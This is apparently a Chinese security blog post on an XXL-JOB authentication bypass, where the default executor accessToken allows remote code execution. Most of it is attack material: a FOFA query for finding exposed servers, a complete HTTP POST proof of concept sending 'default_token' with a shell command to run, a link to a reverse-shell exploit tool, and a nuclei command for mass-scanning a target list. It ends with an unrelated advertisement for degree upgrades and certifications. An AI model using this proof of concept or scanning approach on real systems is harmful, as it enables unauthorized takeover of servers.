0x01 阅读须知
融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 漏洞描述
XXL-JOB 是一款开源的分布式任务调度平台,用于实现大规模任务的调度和执行。XXL-JOB 默认配置下,用于调度通讯的 accessToken 不是随机生成的,而是使用 application.properties 配置文件中的默认值。在实际使用中如果没有修改默认值,攻击者可利用此绕过认证调用 executor,执行任意代码,从而获取服务器权限。经分析和研判,该漏洞利用难度低,可导致远程代码执行。
0x03 漏洞复现
fofa-query: "invalid request, HttpMethod not support" && port="9999"
1.执行poc进行dnslog访问,dnslog服务器得到响应
1.poc
POST /run HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 422
Content-Type: application/json
XXL-JOB-ACCESS-TOKEN: default_token
Accept-Encoding: gzip
{
"jobId": 187270,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 187270,
"logDateTime": 116989791110,
"glueType": "GLUE_SHELL",
"glueSource": "ping x.x.x.x",
"glueUpdatetime": 116989791110,
"broadcastIndex": 0,
"broadcastTotal": 0
}
2.反弹shell利用工具
https://github.com/charonlight/xxl-jobExploitGUI/releases/tag/v1.0
2.nuclei验证脚本已发布于知识星球
nuclei.exe -t xxl-job-executor-default-accessToken.yaml -l subs.txt -stats
学历:非全日制的学历提升,高升专,专升本可学位
安全证书:cisp cissp cisp-pte pmp 等
有需要的私聊